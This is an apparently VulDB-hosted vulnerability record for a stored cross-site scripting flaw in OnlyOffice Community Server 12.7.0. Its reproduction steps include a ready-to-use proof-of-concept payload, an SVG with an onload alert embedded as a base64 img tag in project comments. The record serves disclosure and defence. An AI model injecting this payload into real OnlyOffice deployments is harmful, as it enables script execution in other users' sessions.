| 제목 | Ascensio System SIA OnlyOffice Community Server 12.7.0 Cross Site Scripting |
|---|
| 설명 | Description
In OnlyOffice, users can create projects and add comments. While HTML input is permitted, it also allows embedding SVG images that can contain JavaScript, leading to an XSS vulnerability.
Credits: 0xHamy & Luke Smith
Reproduce
Adding comments to a project:
http://127.0.0.1:8088/Products/Projects/Messages.aspx?prjID=1&id=1#comments
From the comment section, enter raw HTML. The vulnerability can be exploited by abusing the <img> tag to load a base64 encoded SVG image.
Convert the following SVG payload into base64:
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" onload="alert('xss')"><rect width="200" height="200" fill="lightblue" /></svg>
Create the payload using the base64 encoded value:
<img src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyMDAiIGhlaWdodD0iMjAwIiBvbmxvYWQ9ImFsZXJ0KCd4c3MnKSI+PHJlY3Qgd2lkdGg9IjIwMCIgaGVpZ2h0PSIyMDAiIGZpbGw9ImxpZ2h0Ymx1ZSIgLz48L3N2Zz4=" alt="XSS">
The alert will be executed whenever the SVG image loads. |
|---|
| 원천 | ⚠️ https://hkohi.ca/vulnerability/20 |
|---|
| 사용자 | 0xHamy (UID 88518) |
|---|
| 제출 | 2025. 08. 16. AM 05:22 (8 개월 ago) |
|---|
| 모더레이션 | 2025. 09. 11. AM 07:42 (26 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 323614 [Ascensio System SIA OnlyOffice 까지 12.7.0 SVG Image Messages.aspx 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 20 |
|---|